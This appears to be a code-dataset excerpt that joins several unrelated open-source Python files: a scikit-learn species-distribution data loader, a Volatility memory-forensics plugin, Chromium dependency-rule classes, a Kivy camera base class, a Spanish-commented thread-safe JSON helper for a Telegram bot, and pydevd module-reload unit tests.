<http://www.iucnredlist.org/apps/redlist/details/13408/0>`_ ,
also known as the Forest Small Rice Rat, a rodent that lives in Peru,
Colombia, Ecuador, Peru, and Venezuela.
References:
* `"Maximum entropy modeling of species geographic distributions"
<http://www.cs.princeton.edu/~schapire/papers/ecolmod.pdf>`_
S. J. Phillips, R. P. Anderson, R. E. Schapire - Ecological Modelling,
190:231-259, 2006.
Notes:
* See examples/applications/plot_species_distribution_modeling.py
for an example of using this dataset
"""
# Authors: Peter Prettenhofer <[email protected]>
# Jake Vanderplas <[email protected]>
#
# License: BSD 3 clause
from io import BytesIO
from os import makedirs
from os.path import join
from os.path import exists
try:
# Python 2
from urllib2 import urlopen
PY2 = True
except ImportError:
# Python 3
from urllib.request import urlopen
PY2 = False
import numpy as np
from sklearn.datasets.base import get_data_home, Bunch
from sklearn.externals import joblib
DIRECTORY_URL = "http://www.cs.princeton.edu/~schapire/maxent/datasets/"
SAMPLES_URL = join(DIRECTORY_URL, "samples.zip")
COVERAGES_URL = join(DIRECTORY_URL, "coverages.zip")
DATA_ARCHIVE_NAME = "species_coverage.pkz"
def _load_coverage(F, header_length=6, dtype=np.int16):
"""Load a coverage file from an open file object.
This will return a numpy array of the given dtype
"""
header = [F.readline() for i in range(header_length)]
make_tuple = lambda t: (t.split()[0], float(t.split()[1]))
header = dict([make_tuple(line) for line in header])
M = np.loadtxt(F, dtype=dtype)
nodata = header[b'NODATA_value']
if nodata != -9999:
print(nodata)
M[nodata] = -9999
return M
def _load_csv(F):
"""Load csv file.
Parameters
----------
F : file object
CSV file open in byte mode.
Returns
-------
rec : np.ndarray
record array representing the data
"""
if PY2:
# Numpy recarray wants Python 2 str but not unicode
names = F.readline().strip().split(',')
else:
# Numpy recarray wants Python 3 str but not bytes...
names = F.readline().decode('ascii').strip().split(',')
rec = np.loadtxt(F, skiprows=0, delimiter=',', dtype='a22,f4,f4')
rec.dtype.names = names
return rec
def construct_grids(batch):
"""Construct the map grid from the batch object
Parameters
----------
batch : Batch object
The object returned by :func:`fetch_species_distributions`
Returns
-------
(xgrid, ygrid) : 1-D arrays
The grid corresponding to the values in batch.coverages
"""
# x,y coordinates for corner cells
xmin = batch.x_left_lower_corner + batch.grid_size
xmax = xmin + (batch.Nx * batch.grid_size)
ymin = batch.y_left_lower_corner + batch.grid_size
ymax = ymin + (batch.Ny * batch.grid_size)
# x coordinates of the grid cells
xgrid = np.arange(xmin, xmax, batch.grid_size)
# y coordinates of the grid cells
ygrid = np.arange(ymin, ymax, batch.grid_size)
return (xgrid, ygrid)
def fetch_species_distributions(data_home=None,
download_if_missing=True):
"""Loader for species distribution dataset from Phillips et. al. (2006)
Read more in the :ref:`User Guide <datasets>`.
Parameters
----------
data_home : optional, default: None
Specify another download and cache folder for the datasets. By default
all scikit learn data is stored in '~/scikit_learn_data' subfolders.
download_if_missing: optional, True by default
If False, raise a IOError if the data is not locally available
instead of trying to download the data from the source site.
Returns
--------
The data is returned as a Bunch object with the following attributes:
coverages : array, shape = [14, 1592, 1212]
These represent the 14 features measured at each point of the map grid.
The latitude/longitude values for the grid are discussed below.
Missing data is represented by the value -9999.
train : record array, shape = (1623,)
The training points for the data. Each point has three fields:
- train['species'] is the species name
- train['dd long'] is the longitude, in degrees
- train['dd lat'] is the latitude, in degrees
test : record array, shape = (619,)
The test points for the data. Same format as the training data.
Nx, Ny : integers
The number of longitudes (x) and latitudes (y) in the grid
x_left_lower_corner, y_left_lower_corner : floats
The (x,y) position of the lower-left corner, in degrees
grid_size : float
The spacing between points of the grid, in degrees
Notes
------
This dataset represents the geographic distribution of species.
The dataset is provided by Phillips et. al. (2006).
The two species are:
- `"Bradypus variegatus"
<http://www.iucnredlist.org/apps/redlist/details/3038/0>`_ ,
the Brown-throated Sloth.
- `"Microryzomys minutus"
<http://www.iucnredlist.org/apps/redlist/details/13408/0>`_ ,
also known as the Forest Small Rice Rat, a rodent that lives in Peru,
Colombia, Ecuador, Peru, and Venezuela.
References
----------
* `"Maximum entropy modeling of species geographic distributions"
<http://www.cs.princeton.edu/~schapire/papers/ecolmod.pdf>`_
S. J. Phillips, R. P. Anderson, R. E. Schapire - Ecological Modelling,
190:231-259, 2006.
Notes
-----
* See examples/applications/plot_species_distribution_modeling.py
for an example of using this dataset with scikit-learn
"""
data_home = get_data_home(data_home)
if not exists(data_home):
makedirs(data_home)
# Define parameters for the data files. These should not be changed
# unless the data model changes. They will be saved in the npz file
# with the downloaded data.
extra_params = dict(x_left_lower_corner=-94.8,
Nx=1212,
y_left_lower_corner=-56.05,
Ny=1592,
grid_size=0.05)
dtype = np.int16
if not exists(join(data_home, DATA_ARCHIVE_NAME)):
print('Downloading species data from %s to %s' % (SAMPLES_URL,
data_home))
X = np.load(BytesIO(urlopen(SAMPLES_URL).read()))
for f in X.files:
fhandle = BytesIO(X[f])
if 'train' in f:
train = _load_csv(fhandle)
if 'test' in f:
test = _load_csv(fhandle)
print('Downloading coverage data from %s to %s' % (COVERAGES_URL,
data_home))
X = np.load(BytesIO(urlopen(COVERAGES_URL).read()))
coverages = []
for f in X.files:
fhandle = BytesIO(X[f])
print(' - converting', f)
coverages.append(_load_coverage(fhandle))
coverages = np.asarray(coverages, dtype=dtype)
bunch = Bunch(coverages=coverages,
test=test,
train=train,
**extra_params)
joblib.dump(bunch, join(data_home, DATA_ARCHIVE_NAME), compress=9)
else:
bunch = joblib.load(join(data_home, DATA_ARCHIVE_NAME))
return bunch
| bsd-3-clause |
freddierice/volatility | volatility/plugins/linux/vma_cache.py | 58 | 2724 | # Volatility
# Copyright (C) 2007-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Andrew Case
@license: GNU General Public License 2.0
@contact: [email protected]
@organization:
"""
import volatility.obj as obj
import volatility.plugins.linux.common as linux_common
from volatility.plugins.linux.slab_info import linux_slabinfo
class linux_vma_cache(linux_common.AbstractLinuxCommand):
"""Gather VMAs from the vm_area_struct cache"""
def __init__(self, config, *args, **kwargs):
linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
self._config.add_option('UNALLOCATED', short_option = 'u',
default = False,
help = 'Show unallocated',
action = 'store_true')
def calculate(self):
linux_common.set_plugin_members(self)
has_owner = self.profile.obj_has_member("mm_struct", "owner")
cache = linux_slabinfo(self._config).get_kmem_cache("vm_area_struct", self._config.UNALLOCATED)
for vm in cache:
start = vm.vm_start
end = vm.vm_end
if has_owner and vm.vm_mm and vm.vm_mm.is_valid():
task = vm.vm_mm.owner
(task_name, pid) = (task.comm, task.pid)
else:
(task_name, pid) = ("", "")
if vm.vm_file and vm.vm_file.is_valid():
path = vm.vm_file.dentry.get_partial_path()
else:
path = ""
yield task_name, pid, start, end, path
def render_text(self, outfd, data):
self.table_header(outfd, [("Process", "16"),
("PID", "6"),
("Start", "[addrpad]"),
("End", "[addrpad]"),
("Path", "")])
for task_name, pid, start, end, path in data:
self.table_row(outfd, task_name, pid, start, end, path)
| gpl-2.0 |
rrampage/rethinkdb | external/v8_3.30.33.16/buildtools/checkdeps/rules.py | 65 | 6692 | # Copyright 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Base classes to represent dependency rules, used by checkdeps.py"""
import os
import re
class Rule(object):
"""Specifies a single rule for an include, which can be one of
ALLOW, DISALLOW and TEMP_ALLOW.
"""
# These are the prefixes used to indicate each type of rule. These
# are also used as values for self.allow to indicate which type of
# rule this is.
ALLOW = '+'
DISALLOW = '-'
TEMP_ALLOW = '!'
def __init__(self, allow, directory, dependent_directory, source):
self.allow = allow
self._dir = directory
self._dependent_dir = dependent_directory
self._source = source
def __str__(self):
return '"%s%s" from %s.' % (self.allow, self._dir, self._source)
def AsDependencyTuple(self):
"""Returns a tuple (allow, dependent dir, dependee dir) for this rule,
which is fully self-sufficient to answer the question whether the dependent
is allowed to depend on the dependee, without knowing the external
context."""
return self.allow, self._dependent_dir or '.', self._dir or '.'
def ParentOrMatch(self, other):
"""Returns true if the input string is an exact match or is a parent
of the current rule. For example, the input "foo" would match "foo/bar"."""
return self._dir == other or self._dir.startswith(other + '/')
def ChildOrMatch(self, other):
"""Returns true if the input string would be covered by this rule. For
example, the input "foo/bar" would match the rule "foo"."""
return self._dir == other or other.startswith(self._dir + '/')
class MessageRule(Rule):
"""A rule that has a simple message as the reason for failing,
unrelated to directory or source.
"""
def __init__(self, reason):
super(MessageRule, self).__init__(Rule.DISALLOW, '', '', '')
self._reason = reason
def __str__(self):
return self._reason
def ParseRuleString(rule_string, source):
"""Returns a tuple of a character indicating what type of rule this
is, and a string holding the path the rule applies to.
"""
if not rule_string:
raise Exception('The rule string "%s" is empty\nin %s' %
(rule_string, source))
if not rule_string[0] in [Rule.ALLOW, Rule.DISALLOW, Rule.TEMP_ALLOW]:
raise Exception(
'The rule string "%s" does not begin with a "+", "-" or "!".' %
rule_string)
return rule_string[0], rule_string[1:]
class Rules(object):
"""Sets of rules for files in a directory.
By default, rules are added to the set of rules applicable to all
dependee files in the directory. Rules may also be added that apply
only to dependee files whose filename (last component of their path)
matches a given regular expression; hence there is one additional
set of rules per unique regular expression.
"""
def __init__(self):
"""Initializes the current rules with an empty rule list for all
files.
"""
# We keep the general rules out of the specific rules dictionary,
# as we need to always process them last.
self._general_rules = []
# Keys are regular expression strings, values are arrays of rules
# that apply to dependee files whose basename matches the regular
# expression. These are applied before the general rules, but
# their internal order is arbitrary.
self._specific_rules = {}
def __str__(self):
result = ['Rules = {\n (apply to all files): [\n%s\n ],' % '\n'.join(
' %s' % x for x in self._general_rules)]
for regexp, rules in self._specific_rules.iteritems():
result.append(' (limited to files matching %s): [\n%s\n ]' % (
regexp, '\n'.join(' %s' % x for x in rules)))
result.append(' }')
return '\n'.join(result)
def AsDependencyTuples(self, include_general_rules, include_specific_rules):
"""Returns a list of tuples (allow, dependent dir, dependee dir) for the
specified rules (general/specific). Currently only general rules are
supported."""
def AddDependencyTuplesImpl(deps, rules, extra_dependent_suffix=""):
for rule in rules:
(allow, dependent, dependee) = rule.AsDependencyTuple()
tup = (allow, dependent + extra_dependent_suffix, dependee)
deps.add(tup)
deps = set()
if include_general_rules:
AddDependencyTuplesImpl(deps, self._general_rules)
if include_specific_rules:
for regexp, rules in self._specific_rules.iteritems():
AddDependencyTuplesImpl(deps, rules, "/" + regexp)
return deps
def AddRule(self, rule_string, dependent_dir, source, dependee_regexp=None):
"""Adds a rule for the given rule string.
Args:
rule_string: The include_rule string read from the DEPS file to apply.
source: A string representing the location of that string (filename, etc.)
so that we can give meaningful errors.
dependent_dir: The directory to which this rule applies.
dependee_regexp: The rule will only be applied to dependee files
whose filename (last component of their path)
matches the expression. None to match all
dependee files.
"""
rule_type, rule_dir = ParseRuleString(rule_string, source)
if not dependee_regexp:
rules_to_update = self._general_rules
else:
if dependee_regexp in self._specific_rules:
rules_to_update = self._specific_rules[dependee_regexp]
else:
rules_to_update = []
# Remove any existing rules or sub-rules that apply. For example, if we're
# passed "foo", we should remove "foo", "foo/bar", but not "foobar".
rules_to_update = [x for x in rules_to_update
if not x.ParentOrMatch(rule_dir)]
rules_to_update.insert(0, Rule(rule_type, rule_dir, dependent_dir, source))
if not dependee_regexp:
self._general_rules = rules_to_update
else:
self._specific_rules[dependee_regexp] = rules_to_update
def RuleApplyingTo(self, include_path, dependee_path):
"""Returns the rule that applies to |include_path| for a dependee
file located at |dependee_path|.
"""
dependee_filename = os.path.basename(dependee_path)
for regexp, specific_rules in self._specific_rules.iteritems():
if re.match(regexp, dependee_filename):
for rule in specific_rules:
if rule.ChildOrMatch(include_path):
return rule
for rule in self._general_rules:
if rule.ChildOrMatch(include_path):
return rule
return MessageRule('no rule applying.')
| agpl-3.0 |
manthansharma/kivy | kivy/core/camera/__init__.py | 15 | 4285 | '''
Camera
======
Core class for acquiring the camera and converting its input into a
:class:`~kivy.graphics.texture.Texture`.
.. versionchanged:: 1.10.0
The pygst and videocapture providers have been removed.
.. versionchanged:: 1.8.0
There is now 2 distinct Gstreamer implementation: one using Gi/Gst
working for both Python 2+3 with Gstreamer 1.0, and one using PyGST
working only for Python 2 + Gstreamer 0.10.
'''
__all__ = ('CameraBase', 'Camera')
from kivy.utils import platform
from kivy.event import EventDispatcher
from kivy.logger import Logger
from kivy.core import core_select_lib
class CameraBase(EventDispatcher):
'''Abstract Camera Widget class.
Concrete camera classes must implement initialization and
frame capturing to a buffer that can be uploaded to the gpu.
:Parameters:
`index`: int
Source index of the camera.
`size`: tuple (int, int)
Size at which the image is drawn. If no size is specified,
it defaults to the resolution of the camera image.
`resolution`: tuple (int, int)
Resolution to try to request from the camera.
Used in the gstreamer pipeline by forcing the appsink caps
to this resolution. If the camera doesnt support the resolution,
a negotiation error might be thrown.
:Events:
`on_load`
Fired when the camera is loaded and the texture has become
available.
`on_texture`
Fired each time the camera texture is updated.
'''
__events__ = ('on_load', 'on_texture')
def __init__(self, **kwargs):
kwargs.setdefault('stopped', False)
kwargs.setdefault('resolution', (640, 480))
kwargs.setdefault('index', 0)
self.stopped = kwargs.get('stopped')
self._resolution = kwargs.get('resolution')
self._index = kwargs.get('index')
self._buffer = None
self._format = 'rgb'
self._texture = None
self.capture_device = None
kwargs.setdefault('size', self._resolution)
super(CameraBase, self).__init__()
self.init_camera()
if not self.stopped:
self.start()
def _set_resolution(self, res):
self._resolution = res
self.init_camera()
def _get_resolution(self):
return self._resolution
resolution = property(lambda self: self._get_resolution(),
lambda self, x: self._set_resolution(x),
doc='Resolution of camera capture (width, height)')
def _set_index(self, x):
if x == self._index:
return
self._index = x
self.init_camera()
def _get_index(self):
return self._x
index = property(lambda self: self._get_index(),
lambda self, x: self._set_index(x),
doc='Source index of the camera')
def _get_texture(self):
return self._texture
texture = property(lambda self: self._get_texture(),
doc='Return the camera texture with the latest capture')
def init_camera(self):
'''Initialise the camera (internal)'''
pass
def start(self):
'''Start the camera acquire'''
self.stopped = False
def stop(self):
'''Release the camera'''
self.stopped = True
def _update(self, dt):
'''Update the camera (internal)'''
pass
def _copy_to_gpu(self):
'''Copy the the buffer into the texture'''
if self._texture is None:
Logger.debug('Camera: copy_to_gpu() failed, _texture is None !')
return
self._texture.blit_buffer(self._buffer, colorfmt=self._format)
self._buffer = None
self.dispatch('on_texture')
def on_texture(self):
pass
def on_load(self):
pass
# Load the appropriate providers
providers = ()
if platform == 'macosx':
providers += (('avfoundation', 'camera_avfoundation',
'CameraAVFoundation'), )
elif platform == 'android':
providers += (('android', 'camera_android', 'CameraAndroid'), )
providers += (('opencv', 'camera_opencv', 'CameraOpenCV'), )
Camera = core_select_lib('camera', (providers))
| mit |
J-Rios/TelegramBots | MolaBot/TSjson.py | 1 | 10795 | # -*- coding: utf-8 -*-
'''
Script: MolaBot.py
Descripcion:
Bot de Telegram que gestiona todo un sistema de reputaciones de los usuarios pertenecientes a
un grupo. Permite a un usuario, dar "Likes" a los mensajes de otros, y el numero global de
"Likes" (la suma de todos los likes de todos los mensajes de un mismo usuario) determinara los
puntos de reputacion que dicho usuario tiene.
Autor: Jose Rios Rubio
Fecha: 26/07/2017
Version: 1.7
'''
import os
import json
from threading import Lock
from collections import OrderedDict
class TSjson:
'''
Clase de acceso para lectura y escritura de archivos json generales de forma segura desde
cualquier hilo de ejecucion (Thread-Safe).
'''
# Constructor de la clase
def __init__(self, file_name):
self.lock = Lock() #Inicializa el Lock
self.file_name = file_name # Adquiere el nombre del archivo a controlar
# Funcion para leer de un archivo json
def read(self):
try: # Intentar abrir el archivo
self.lock.acquire() # Cerramos (adquirimos) el mutex
if not os.path.exists(self.file_name): # Si el archivo no existe
read = {} # Devolver un diccionario vacio
else: # Si el archivo existe
if not os.stat(self.file_name).st_size: # Si el archivo esta vacio
read = {} # Devolver un diccionario vacio
else: # El archivo existe y tiene contenido
with open(self.file_name, "r") as f: # Abrir el archivo en modo lectura
read = json.load(f, object_pairs_hook=OrderedDict) # Leer todo el archivo y devolver la lectura de los datos json usando un diccionario ordenado
except: # Error intentando abrir el archivo
print(" Error cuando se abria para lectura, el archivo {}".format(self.file_name)) # Escribir en consola el error
read = None # Devolver None
finally: # Para acabar, haya habido excepcion o no
self.lock.release() # Abrimos (liberamos) el mutex
return read # Devolver el resultado de la lectura de la funcion
# Funcion para escribir en un archivo json
def write(self, data):
# Si no existe el directorio que contiene los archivos de datos, lo creamos
directory = os.path.dirname(self.file_name) # Obtener el nombre del directorio que contiene al archivo
if not os.path.exists(directory): # Si el directorio (ruta) no existe
os.makedirs(directory) # Creamos el directorio
try: # Intentar abrir el archivo
self.lock.acquire() # Cerramos (adquirimos) el mutex
with open(self.file_name, "w") as f: # Abrir el archivo en modo escritura (sobre-escribe)
#if CONST['PYTHON'] == 2: # Compatibilidad con Python 2
# f.write("\n{}\n".format(json.dumps(data, ensure_ascii=False, indent=4))) # Escribimos en el archivo los datos json asegurando todos los caracteres ascii, codificacion utf-8 y una "indentacion" de 4 espacios
#else:
f.write("\n{}\n".format(json.dumps(data, indent=4))) # Escribimos en el archivo los datos json asegurando todos los caracteres ascii, codificacion utf-8 y una "indentacion" de 4 espacios
except: # Error intentando abrir el archivo
print(" Error cuando se abria para escritura, el archivo {}".format(self.file_name)) # Escribir en consola el error
finally: # Para acabar, haya habido excepcion o no
self.lock.release() # Abrimos (liberamos) el mutex
# Funcion para leer el contenido de un archivo json (datos json)
def read_content(self):
read = self.read() # Leer todo el archivo json
if read != {}: # Si la lectura no es vacia
return read['Content'] # Devolvemos el contenido de la lectura (datos json)
else: # Lectura vacia
return read # Devolvemos la lectura vacia
# Funcion para aΓ±adir al contenido de un archivo json, nuevos datos json
def write_content(self, data):
# Si no existe el directorio que contiene los archivos de datos, lo creamos
directory = os.path.dirname(self.file_name) # Obtener el nombre del directorio que contiene al archivo
if not os.path.exists(directory): # Si el directorio (ruta) no existe
os.makedirs(directory) # Creamos el directorio
try: # Intentar abrir el archivo
self.lock.acquire() # Cerramos (adquirimos) el mutex
if os.path.exists(self.file_name) and os.stat(self.file_name).st_size: # Si el archivo existe y no esta vacio
with open(self.file_name, "r") as f: # Abrir el archivo en modo lectura
content = json.load(f, object_pairs_hook=OrderedDict) # Leer todo el archivo y devolver la lectura de los datos json usando un diccionario ordenado
content['Content'].append(data) # AΓ±adir los nuevos datos al contenido del json
with open(self.file_name, "w") as f: # Abrir el archivo en modo escritura (sobre-escribe)
f.write("\n{}\n".format(json.dumps(content, indent=4))) # Escribimos en el archivo los datos json asegurando todos los caracteres ascii, codificacion utf-8 y una "indentacion" de 4 espacios
else: # El archivo no existe o esta vacio
with open(self.file_name, "w") as f: # Abrir el archivo en modo escritura (sobre-escribe)
f.write('\n{\n "Content": []\n}\n') # Escribir la estructura de contenido basica
with open(self.file_name, "r") as f: # Abrir el archivo en modo lectura
content = json.load(f) # Leer todo el archivo
content['Content'].append(data) # AΓ±adir los datos al contenido del json
with open(self.file_name, "w") as f: # Abrir el archivo en modo escritura (sobre-escribe)
f.write("\n{}\n".format(json.dumps(content, indent=4))) # Escribimos en el archivo los datos json asegurando todos los caracteres ascii, codificacion utf-8 y una "indentacion" de 4 espacios
except IOError as e:
print(" I/O error({0}): {1}".format(e.errno, e.strerror))
except ValueError:
print(" Error en conversion de dato")
except: # Error intentando abrir el archivo
print(" Error cuando se abria para escritura, el archivo {}".format(self.file_name)) # Escribir en consola el error
finally: # Para acabar, haya habido excepcion o no
self.lock.release() # Abrimos (liberamos) el mutex
# Funcion para actualizar datos de un archivo json
# [Nota: cada dato json necesita al menos 1 elemento identificador unico (uide), si no es asi, la actualizacion se producira en el primer elemento que se encuentre]
def update(self, data, uide):
file_data = self.read() # Leer todo el archivo json
# Buscar la posicion del dato en el contenido json
found = 0 # Posicion encontrada a 0
i = 0 # Posicion inicial del dato a 0
for msg in file_data['Content']: # Para cada mensaje en el archivo json
if data[uide] == msg[uide]: # Si el mensaje tiene el UIDE buscado
found = 1 # Marcar que se ha encontrado la posicion
break # Interrumpir y salir del bucle
i = i + 1 # Incrementar la posicion del dato
if found: # Si se encontro en el archivo json datos con el UIDE buscado
file_data['Content'][i] = data # Actualizamos los datos json que contiene ese UIDE
self.write(file_data) # Escribimos el dato actualizado en el archivo json
else: # No se encontro ningun dato json con dicho UIDE
print(" Error: UIDE no encontrado en el archivo, o el archivo no existe") # Escribir en consola el error
# Funcion para actualizar datos internos de los datos de un archivo json
# [Nota: cada dato json necesita al menos 1 elemento identificador unico (uide), si no es asi, la actualizacion se producira en el primer elemento que se encuentre]
def update_twice(self, data, uide1, uide2):
file_data = self.read() # Leer todo el archivo json
# Buscar la posicion del dato en el contenido json
found = 0 # Posicion encontrada a 0
i = 0 # Posicion inicial del dato a 0
for msg in file_data['Content']: # Para cada mensaje en el archivo json
if (data[uide1] == msg[uide1]) and (data[uide2] == msg[uide2]): # Si el mensaje tiene el UIDE buscado
found = 1 # Marcar que se ha encontrado la posicion
break # Interrumpir y salir del bucle
i = i + 1 # Incrementar la posicion del dato
if found: # Si se encontro en el archivo json datos con el UIDE buscado
file_data['Content'][i] = data # Actualizamos los datos json que contiene ese UIDE
self.write(file_data) # Escribimos el dato actualizado en el archivo json
else: # No se encontro ningun dato json con dicho UIDE
print(" Error: UIDE no encontrado en el archivo, o el archivo no existe") # Escribir en consola el error
# Funcion para limpiar todos los datos de un archivo json (no se usa actualmente)
def clear_content(self):
try: # Intentar abrir el archivo
self.lock.acquire() # Cerramos (adquirimos) el mutex
if os.path.exists(self.file_name) and os.stat(self.file_name).st_size: # Si el archivo existe y no esta vacio
with open(self.file_name, "w") as f: # Abrir el archivo en modo escritura (sobre-escribe)
f.write('\n{\n "Content": [\n ]\n}\n') # Escribir la estructura de contenido basica
except: # Error intentando abrir el archivo
print(" Error cuando se abria para escritura, el archivo {}".format(self.file_name)) # Escribir en consola el error
finally: # Para acabar, haya habido excepcion o no
self.lock.release() # Abrimos (liberamos) el mutex
# funcion para eliminar un archivo json (no se usa actualmente)
def delete(self):
self.lock.acquire() # Cerramos (adquirimos) el mutex
if os.path.exists(self.file_name): # Si el archivo existe
os.remove(self.file_name) # Eliminamos el archivo
self.lock.release() # Abrimos (liberamos) el mutex
| gpl-3.0 |
powlo/script.module.pydevd | lib/test_pydevd_reload/test_pydevd_reload.py | 53 | 11450 | import os # @NoMove
import sys # @NoMove
sys.path.insert(0, os.path.realpath(os.path.abspath('..')))
import pydevd_reload
import tempfile
import unittest
SAMPLE_CODE = """
class C:
def foo(self):
return 0
@classmethod
def bar(cls):
return (0, 0)
@staticmethod
def stomp():
return (0, 0, 0)
def unchanged(self):
return 'unchanged'
"""
class Test(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
self.tempdir = None
self.save_path = None
self.tempdir = tempfile.mkdtemp()
self.save_path = list(sys.path)
sys.path.append(self.tempdir)
try:
del sys.modules['x']
except:
pass
def tearDown(self):
unittest.TestCase.tearDown(self)
sys.path = self.save_path
try:
del sys.modules['x']
except:
pass
def make_mod(self, name="x", repl=None, subst=None, sample=SAMPLE_CODE):
fn = os.path.join(self.tempdir, name + ".py")
f = open(fn, "w")
if repl is not None and subst is not None:
sample = sample.replace(repl, subst)
try:
f.write(sample)
finally:
f.close()
def test_pydevd_reload(self):
self.make_mod()
import x
C = x.C
COut = C
Cfoo = C.foo
Cbar = C.bar
Cstomp = C.stomp
def check2(expected):
C = x.C
Cfoo = C.foo
Cbar = C.bar
Cstomp = C.stomp
b = C()
bfoo = b.foo
self.assertEqual(expected, b.foo())
self.assertEqual(expected, bfoo())
self.assertEqual(expected, Cfoo(b))
def check(expected):
b = COut()
bfoo = b.foo
self.assertEqual(expected, b.foo())
self.assertEqual(expected, bfoo())
self.assertEqual(expected, Cfoo(b))
self.assertEqual((expected, expected), Cbar())
self.assertEqual((expected, expected, expected), Cstomp())
check2(expected)
check(0)
# modify mod and reload
count = 0
while count < 1:
count += 1
self.make_mod(repl="0", subst=str(count))
pydevd_reload.xreload(x)
check(count)
def test_pydevd_reload2(self):
self.make_mod()
import x
c = x.C()
cfoo = c.foo
self.assertEqual(0, c.foo())
self.assertEqual(0, cfoo())
self.make_mod(repl="0", subst='1')
pydevd_reload.xreload(x)
self.assertEqual(1, c.foo())
self.assertEqual(1, cfoo())
def test_pydevd_reload3(self):
class F:
def m1(self):
return 1
class G:
def m1(self):
return 2
self.assertEqual(F().m1(), 1)
pydevd_reload.Reload(None)._update(None, None, F, G)
self.assertEqual(F().m1(), 2)
def test_pydevd_reload4(self):
class F:
pass
F.m1 = lambda a:None
class G:
pass
G.m1 = lambda a:10
self.assertEqual(F().m1(), None)
pydevd_reload.Reload(None)._update(None, None, F, G)
self.assertEqual(F().m1(), 10)
def test_if_code_obj_equals(self):
class F:
def m1(self):
return 1
class G:
def m1(self):
return 1
class H:
def m1(self):
return 2
if hasattr(F.m1, 'func_code'):
self.assertTrue(pydevd_reload.code_objects_equal(F.m1.func_code, G.m1.func_code))
self.assertFalse(pydevd_reload.code_objects_equal(F.m1.func_code, H.m1.func_code))
else:
self.assertTrue(pydevd_reload.code_objects_equal(F.m1.__code__, G.m1.__code__))
self.assertFalse(pydevd_reload.code_objects_equal(F.m1.__code__, H.m1.__code__))
def test_metaclass(self):
class Meta(type):
def __init__(cls, name, bases, attrs):
super(Meta, cls).__init__(name, bases, attrs)
class F:
__metaclass__ = Meta
def m1(self):
return 1
class G:
__metaclass__ = Meta
def m1(self):
return 2
self.assertEqual(F().m1(), 1)
pydevd_reload.Reload(None)._update(None, None, F, G)
self.assertEqual(F().m1(), 2)
def test_change_hierarchy(self):
class F(object):
def m1(self):
return 1
class B(object):
def super_call(self):
return 2
class G(B):
def m1(self):
return self.super_call()
self.assertEqual(F().m1(), 1)
old = pydevd_reload.notify_error
self._called = False
def on_error(*args):
self._called = True
try:
pydevd_reload.notify_error = on_error
pydevd_reload.Reload(None)._update(None, None, F, G)
self.assertTrue(self._called)
finally:
pydevd_reload.notify_error = old
def test_change_hierarchy_old_style(self):
class F:
def m1(self):
return 1
class B:
def super_call(self):
return 2
class G(B):
def m1(self):
return self.super_call()
self.assertEqual(F().m1(), 1)
old = pydevd_reload.notify_error
self._called = False
def on_error(*args):
self._called = True
try:
pydevd_reload.notify_error = on_error
pydevd_reload.Reload(None)._update(None, None, F, G)
self.assertTrue(self._called)
finally:
pydevd_reload.notify_error = old
def test_create_class(self):
SAMPLE_CODE1 = """
class C:
def foo(self):
return 0
"""
# Creating a new class and using it from old class
SAMPLE_CODE2 = """
class B:
pass
class C:
def foo(self):
return B
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
foo = x.C().foo
self.assertEqual(foo(), 0)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(foo().__name__, 'B')
def test_create_class2(self):
SAMPLE_CODE1 = """
class C(object):
def foo(self):
return 0
"""
# Creating a new class and using it from old class
SAMPLE_CODE2 = """
class B(object):
pass
class C(object):
def foo(self):
return B
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
foo = x.C().foo
self.assertEqual(foo(), 0)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(foo().__name__, 'B')
def test_parent_function(self):
SAMPLE_CODE1 = """
class B(object):
def foo(self):
return 0
class C(B):
def call(self):
return self.foo()
"""
# Creating a new class and using it from old class
SAMPLE_CODE2 = """
class B(object):
def foo(self):
return 0
def bar(self):
return 'bar'
class C(B):
def call(self):
return self.bar()
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
call = x.C().call
self.assertEqual(call(), 0)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(call(), 'bar')
def test_update_constant(self):
SAMPLE_CODE1 = """
CONSTANT = 1
class B(object):
def foo(self):
return CONSTANT
"""
SAMPLE_CODE2 = """
CONSTANT = 2
class B(object):
def foo(self):
return CONSTANT
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
foo = x.B().foo
self.assertEqual(foo(), 1)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(foo(), 1) #Just making it explicit we don't reload constants.
def test_update_constant_with_custom_code(self):
SAMPLE_CODE1 = """
CONSTANT = 1
class B(object):
def foo(self):
return CONSTANT
"""
SAMPLE_CODE2 = """
CONSTANT = 2
def __xreload_old_new__(namespace, name, old, new):
if name == 'CONSTANT':
namespace[name] = new
class B(object):
def foo(self):
return CONSTANT
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
foo = x.B().foo
self.assertEqual(foo(), 1)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(foo(), 2) #Actually updated it now!
def test_reload_custom_code_after_changes(self):
SAMPLE_CODE1 = """
CONSTANT = 1
class B(object):
def foo(self):
return CONSTANT
"""
SAMPLE_CODE2 = """
CONSTANT = 1
def __xreload_after_reload_update__(namespace):
namespace['CONSTANT'] = 2
class B(object):
def foo(self):
return CONSTANT
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
foo = x.B().foo
self.assertEqual(foo(), 1)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(foo(), 2) #Actually updated it now!
def test_reload_custom_code_after_changes_in_class(self):
SAMPLE_CODE1 = """
class B(object):
CONSTANT = 1
